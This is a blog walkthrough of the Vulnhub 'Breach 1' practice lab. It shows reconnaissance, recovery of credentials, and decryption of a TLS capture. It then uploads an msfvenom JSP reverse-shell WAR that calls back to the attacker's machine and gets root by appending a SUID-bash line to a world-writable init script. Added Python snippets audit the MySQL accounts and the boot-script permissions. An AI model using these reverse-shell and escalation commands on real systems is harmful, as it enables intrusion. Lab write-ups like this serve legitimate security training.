
[Vulnhub] Breach Walkthrough

jeff_kim 2024. 7. 22. 19:25

https://www.vulnhub.com/entry/breach-1,152/

 

Breach: 1


This weekend I migrated my Kali Linux environment to VMware Workstation to set up an internal-network pentesting home lab.

I had already used VMware while studying cloud, so the environment setup went fairly smoothly, and I am picking the exercises back up starting from Breach.

 

One thing to note: this lab VM has its IP fixed at 192.168.110.140, so I changed the NAT network adapter to the 192.168.110.0/24 range before starting.

 

 

Reconnaissance

discovery

└─$ sudo nmap -sn 192.168.110.0/24
Nmap scan report for 192.168.110.140
Host is up (0.00015s latency).
MAC Address: 00:0C:29:17:24:9F (VMware)

110.140 is up, as expected.

nmap -p- --max-retries 1 --min-rate 2000 -Pn -n --open -iL ./scope.txt -oA ./recon/tcpAll

The scan came back with every single port open...

Let's start by doing some quick information gathering on the commonly used ports.

# ftp - 21
└─$ ftp 192.168.110.140
Connected to 192.168.110.140.
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00421 Service not available, remote server has closed connection.
ftp> ls
Not connected.


#smtp - 25
└─$ telnet 192.168.110.140 25
Trying 192.168.110.140...
Connected to 192.168.110.140.
Escape character is '^]'.
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00Connection closed by foreign host.

# mount
└─$ showmount -e 192.168.110.140                                                        
clnt_create: RPC: Unable to receive

# smb - 445 
└─$ smbclient -L 192.168.110.140
Protocol negotiation to server 192.168.110.140 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_RESET

 

Nothing stands out there, so let's move on to web information gathering.

WEB

There is an encoded string inside a comment in the page source.

Let's base64-decode it.

└─$ echo 'Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo' | base64 --decode | base64 --decode
pgibbons:damnitfeel$goodtobeagang$ta

It was encoded twice.

 

There is also a hyperlink to intech.html.

Going into the Employee portal, ImpressCMS is set up there.

Logging in with the credentials obtained above succeeded, so I clicked submit and looked around.

To find a vulnerability worth using, let's gather a bit more information.

 

Vulnerability

192.168.110.140/.keystore

SSL 

└─$ wget http://192.168.110.140/.keystore                                                     
--2024-07-22 04:55:41--  http://192.168.110.140/.keystore              
Connecting to 192.168.110.140:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2245 (2.2K)
Saving to: ‘.keystore’

.keystore                                       100%[====================================================================================================>]   2.19K  --.-KB/s    in 0s      

2024-07-22 04:55:41 (383 MB/s) - ‘.keystore’ saved [2245/2245]

└─$ strings .keystore      
tomcat
R|(A
q15Y?
]c["y
Yrf!K\
@V      e
2j;2>
A@7B
`=aw
]]bOP
Ksh\x
c\q
e@&~
@-C8o
GF-=#sO
*O\F
Qt;6
X.509
Unknown1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown0
160520175107Z
160818175107Z0l1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown1
Unknown0
W1,X
jg&_jp
*EyX,9  p

Hmm ...

This doesn't seem to be the way in,

so let's look into the SSL side instead.

└─$ wget http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
--2024-07-22 04:58:33--  http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
Connecting to 192.168.110.140:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41412 (40K) [application/vnd.tcpdump.pcap]
Saving to: ‘_SSL_test_phase1.pcap’

_SSL_test_phase1.pcap                           100%[====================================================================================================>]  40.44K  --.-KB/s    in 0s      

2024-07-22 04:58:33 (200 MB/s) - ‘_SSL_test_phase1.pcap’ saved [41412/41412]

└─$ wireshark _SSL_test_phase1.pcap

Most of the capture is encrypted; it looks like the .keystore is what was meant to decrypt it.

 

Searching on Google, the encrypted traffic has to be decrypted using something called java keytool.

First the keystore is converted to PKCS12, then the decryption is done.

└─$ keytool -importkeystore \
> -srckeystore keystore \
> -destkeystore keystore.p12 \
> -deststoretype PKCS12 \
> -srcalias tomcat \
> -deststorepass tomcat \
> -destkeypass tomcat
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Importing keystore keystore to keystore.p12...
Enter source keystore password:

└─$ ls
keystore  keystore.p12  recon  scope.txt  _SSL_test_phase1.pcap

 

Run Wireshark again, then go to Edit -> Preferences -> Protocols and find TLS.

Click Edit and add the key entry as shown above. After that, reopen the downloaded pcap file and the following can be seen.

└─$ echo 'dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC' | base64 --decode
tomcat:Tt\5D8F(#!*u=G)4m7zB

Obtained a base64-encoded password -> decoded it.

Let's use the obtained credentials to access /_M@nag3Me/html. The port is 8443, of course; keep that in mind, and you have to prefix https!

Now it's time to attack.

Once on this Tomcat manager page, uploading a WAR file containing a reverse shell yields a reverse shell.

 

Exploitation

Let's generate the payload with msfvenom.

└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=7777 -f war -o revshell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytes
Saved as: revshell.war


# reverse shell listening
└─$ nc -nlvp 7777            
listening on [any] 7777 ...

Click /revshell!

Initial foothold on the target host achieved.

 

Post-Exploitation

Looking around, I found a directory /var/www/5446 with 777 permissions, and obtained the database details from a php file in it.

tomcat6@Breach:/var/www/5446$ cat 0d93f85c5061c44cdffeb8381b2772fd.php
<?php
/**
* All information in order to connect to database are going through here.
*
* Be careful if you are changing data's in this file.
*
* @copyright    http://www.xoops.org/ The XOOPS Project
* @copyright    XOOPS_copyrights.txt
* @copyright    http://www.impresscms.org/ The ImpressCMS Project
* @license              http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU General Public License (GPL)
* @package              installer
* @since                1.0
* @author               marcan <marcan@impresscms.org>
* @author          Sina Asghari (aka stranger) <pesian_stranger@users.sourceforge.net>
* @version              $Id: sdata.dist.php 8570 2009-04-11 13:15:53Z icmsunderdog $
*/

// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define( 'SDATA_DB_HOST', 'localhost' );

// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );

// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );

// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define( 'SDATA_DB_NAME', 'impresscms' );

// Table Prefix
// This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'icms'
define( 'SDATA_DB_PREFIX', 'ia44db101' );

// Password Salt Key $mainSalt
// This salt will be appended to passwords in the icms_encryptPass() function.
// Do NOT change this once your site is Live, doing so will invalidate everyones Password.
define( 'SDATA_DB_SALT', 'EQ9eLioElpacrtYZFQrGiDvB5OQGXzq2jfA4okdsZzkVNGhka6blxUTrozLOuFSA4' );
?>

The password is empty!! Let's try connecting.

tomcat6@Breach:/var/www/5446$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.5.49-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| impresscms         |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.03 sec)

mysql> use mysql;
mysql> show tables;
mysql> select Host,User,Password from user;
+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| localhost | root             |                                           |
|           | milton           | 6450d89bd3aff1d893b85d3ad65d2ec2          |
| 127.0.0.1 | root             |                                           |
| ::1       | root             |                                           |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)

Found milton... hehe. Let's try cracking the hash.

Cracking result

6450d89bd3aff1d893b85d3ad65d2ec2 : thelaststraw

# milton credentials

milton:thelaststraw
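The mysql.user output above shows two things an auditor should flag: three root accounts with no password at all, and a password column that is not in MySQL's own format (a 32-hex MD5 digest rather than the 41-character `*SHA1` form the debian-sys-maint row has). The following is an added example, not code from the post, that parses the mysql client's bordered table (the rows above embedded as constructed input) and classifies each account's password scheme:

```python
import hashlib
import re

# Constructed input: the mysql.user rows from this walkthrough, pasted as the
# bordered table the mysql client prints.
MYSQL_USER_TABLE = """\
+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| localhost | root             |                                           |
|           | milton           | 6450d89bd3aff1d893b85d3ad65d2ec2          |
| 127.0.0.1 | root             |                                           |
| ::1       | root             |                                           |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
"""

def parse_mysql_table(text):
    """Turn the mysql client's bordered output into a list of row dicts."""
    rows = [ln for ln in text.splitlines() if ln.startswith("|")]
    cells = [[c.strip() for c in r.strip("|").split("|")] for r in rows]
    return [dict(zip(cells[0], r)) for r in cells[1:]]

def classify_password(value):
    """Name the scheme a mysql.user Password value is stored in."""
    if value == "":
        return "empty"          # account logs in with no password at all
    if re.fullmatch(r"\*[0-9A-F]{40}", value):
        return "mysql-native"   # SHA1(SHA1(pw)), what MySQL 4.1+ writes itself
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "md5-hex"        # not a MySQL scheme: a raw MD5 digest was inserted
    return "unknown"

def verify_md5_candidate(hash_hex, candidate):
    """Check one guessed password against a raw MD5 hex digest."""
    return hashlib.md5(candidate.encode()).hexdigest() == hash_hex.lower()

def audit_accounts(text):
    """Return (host, user, finding) for every account that needs attention."""
    findings = []
    for row in parse_mysql_table(text):
        scheme = classify_password(row["Password"])
        if scheme == "empty":
            findings.append((row["Host"], row["User"], "no password set"))
        elif scheme != "mysql-native":
            findings.append((row["Host"], row["User"], f"non-native hash ({scheme})"))
    return findings
```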

 

 

Privilege Escalation

milton@Breach:~$ cat some_script.sh 


 _____ _                   _                   _   _     _               _                   
|_   _| |                 ( )                 | | | |   (_)             | |                  
  | | | |__   ___ _ __ ___|/ ___   _ __   ___ | |_| |__  _ _ __   __ _  | |__   ___ _ __ ___ 
  | | | '_ \ / _ \ '__/ _ \ / __| | '_ \ / _ \| __| '_ \| | '_ \ / _` | | '_ \ / _ \ '__/ _ \
  | | | | | |  __/ | |  __/ \__ \ | | | | (_) | |_| | | | | | | | (_| | | | | |  __/ | |  __/
  \_/ |_| |_|\___|_|  \___| |___/ |_| |_|\___/ \__|_| |_|_|_| |_|\__, | |_| |_|\___|_|  \___|
                                                                  __/ |                      
                                                                 |___/

The groups milton belongs to include adm.

milton@Breach:~$ find / -group adm -type f -ls   2> /dev/null | grep -v '.gz'
530040    0 -rw-r-----   1 mysql    adm             0 Jun  7  2016 /var/log/mysql.log
526766    0 -rw-r-----   1 root     adm             0 Jun  6  2016 /var/log/apt/term.log
524944  116 -rw-r-----   1 root     adm        118463 Jul 22 13:22 /var/log/dmesg
530047 3520 -rw-r-----   1 syslog   adm       3597275 Jun  5  2016 /var/log/kern.log.1
530053   32 -rw-r-----   1 mysql    adm         24759 Jul 22 13:22 /var/log/mysql/error.log
530048  164 -rw-r-----   1 syslog   adm        163180 Jun  6  2016 /var/log/auth.log.1
524835  116 -rw-r-----   1 root     adm        118669 Jul 22 13:06 /var/log/dmesg.0
525299    4 -rw-r-----   1 root     adm            31 Feb 17  2016 /var/log/fsck/checkroot
525298    4 -rw-r-----   1 root     adm            31 Feb 17  2016 /var/log/fsck/checkfs
528284  752 -rw-r-----   1 root     adm        767861 Jun  6  2016 /var/log/apache2/other_vhosts_access.log.1
530018    0 -rw-r-----   1 root     adm             0 Jun  7  2016 /var/log/apache2/other_vhosts_access.log
530019 3804 -rw-r-----   1 root     adm       3890033 Jun  6  2016 /var/log/apache2/access.log.1
526554 14608 -rw-r-----   1 root     adm      14955108 Jul 22 13:58 /var/log/apache2/access.log
530042  648 -rw-r-----   1 root     adm        659383 Jun  6  2016 /var/log/apache2/error.log.1
526649 8796 -rw-r-----   1 root     adm       9001989 Jul 22 13:38 /var/log/apache2/error.log
528194    0 -rw-r-----   1 mysql    adm             0 May 24  2016 /var/log/mysql.err
526625 3016 -rw-r-----   1 syslog   adm       3084253 Jul 22 13:28 /var/log/kern.log
526622 2660 -rw-r-----   1 syslog   adm       2718042 Jul 22 14:57 /var/log/syslog
528197  828 -rw-r-----   1 syslog   adm        841429 Jun  7  2016 /var/log/syslog.1
528385  248 -rw-r-----   1 syslog   adm        248492 Jul 22 14:57 /var/log/auth.log

 

Leaving the .gz files aside, let's check /var/log/syslog.

A script, /usr/share/cleanup/tidyup.sh, is being run from cron.

 

milton@Breach:~$ cat /usr/share/cleanup/tidyup.sh
#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

The script above runs every 3 minutes. However, I have no write permission on it, so I need to find another file that I can write to.

 

milton@Breach:~$ find / -writable -type f 2> /dev/null
...
/etc/init.d/portly.sh
...
milton@Breach:~$ ls -al /etc/init.d/portly.sh
-rwxrwxrwx 1 root root 231 Jun  5  2016 /etc/init.d/portly.sh

milton@Breach:~$ cat /etc/init.d/portly.sh
#!/bin/bash

iptables -t nat -A PREROUTING -p tcp --match multiport --dport 1:79,81:8442,8444:65535 -j REDIRECT --to-ports 4444 && /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures -D

This iptables rule redirects every port except 80 and 8443 to portspoof on 4444, which is why the earlier scan showed every port as open. Linux runs everything in /etc/init.d at system boot.

milton@Breach:~$ echo "cp /bin/bash /tmp/rootshell; chmod 4777 /tmp/rootshell;" >> /etc/init.d/portly.sh

milton@Breach:~$ cat /etc/init.d/portly.sh
#!/bin/bash

iptables -t nat -A PREROUTING -p tcp --match multiport --dport 1:79,81:8442,8444:65535 -j REDIRECT --to-ports 4444 && /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures -D
cp /bin/bash /tmp/rootshell; chmod 4777 /tmp/rootshell;

Let's reboot once and reconnect.

rootshell has been created with root ownership.

Since it is identical to /bin/bash, running it with -p gave me root privileges.
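The root cause of this escalation is a root-executed boot script that is mode 0777. As an added example (not part of the post), the following audit walks directories whose scripts run as root at boot or from cron and reports any regular file writable by others or by a non-root group; `build_demo_initd` creates a constructed stand-in for /etc/init.d so the check can be exercised without touching the real system:

```python
import os
import stat
import tempfile

# Directories whose scripts run as root at boot or on a schedule; constructed
# list for this example, extend it for the distribution being audited.
PRIVILEGED_SCRIPT_DIRS = ["/etc/init.d", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily"]

def describe_writable(path):
    """Return why a regular file is risky (writable by others, or by a non-root group), else None."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return None
    reasons = []
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        reasons.append("writable by non-root group")
    return ", ".join(reasons) or None

def audit_dirs(dirs):
    """Scan each directory and return {path: reason} for every risky script."""
    findings = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            reason = describe_writable(path)
            if reason:
                findings[path] = reason
    return findings

def build_demo_initd():
    """Constructed stand-in for /etc/init.d: one 0755 script and one 0777 script."""
    root = tempfile.mkdtemp(prefix="initd-demo-")
    for name, mode in (("networking", 0o755), ("portly.sh", 0o777)):
        path = os.path.join(root, name)
        with open(path, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    for path, reason in audit_dirs(PRIVILEGED_SCRIPT_DIRS).items():
        print(f"{path}: {reason}")
```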

rootshell-4.3# cat .flag.txt
cat .flag.txt
-----------------------------------------------------------------------------------

______                     _     __   _____      _____ _          _____          _ 
| ___ \                   | |   /  | |  _  |    |_   _| |        |  ___|        | |
| |_/ /_ __ ___  __ _  ___| |__ `| | | |/' |______| | | |__   ___| |__ _ __   __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | |  /| |______| | | '_ \ / _ \  __| '_ \ / _` |
| |_/ / | |  __/ (_| | (__| | | || |_\ |_/ /      | | | | | |  __/ |__| | | | (_| |
\____/|_|  \___|\__,_|\___|_| |_\___(_)___/       \_/ |_| |_|\___\____/_| |_|\__,_|


-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

 
